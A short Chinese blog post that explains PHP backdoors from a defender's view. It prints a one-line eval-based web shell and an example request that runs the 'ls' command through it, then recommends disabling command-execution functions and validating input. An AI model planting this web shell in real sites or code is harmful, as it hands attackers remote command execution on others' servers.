BlackDoor-记录

前言

本文不教授任何黑服务器的教程（1、不怎么会；2、不透露。），只做一个后门代码的介绍与防护，依旧是用世界上最好的语言来做演示与讲解。所谓的后门程序指的是那些可以绕过安全性控制从而达到可以达到系统访问权的程序方法。

示例

@eval($_GET['shell']);

没有看错只有一句代码，php中eval是内置函数，该方法可以将字符串解释成php代码进行执行，就相当于我们本来没有权限在系统中执行操作，现在只要通过这个（door）就可以直接执行我们想要执行的程序。下面截图是执行示例截图：

这样我们传递了一个参数shell=echo shell_exec("ls");在PHP中执行shell命令有exec()、shell_exec()、system()等方法，上面那个例子我们就执行了linux的命令·ls·，结果打印了当前文件列表，说明执行成功。不同语言有不同执行方法，像java的Process exec(str)方法，python的os.system(str)等方法。那么问题来了，有开门的方法那肯定也有关门的方法，那就是从根本上杜绝此问题，像php中直接可以在配置文件中禁止这类函数的执行，其他语言也一样可以禁止。这仅仅是一小部分，不过想要实现上面的这类留·后门·，首先你想进·门·，那肯定得找到·洞(bug)·具体找洞得方法不做描述。我是小白，仅次记录服务器被黑到解决学到别人入侵地方式，也是提醒自己提高编程规范，提高编码安全意识，该做验证一定要做验证。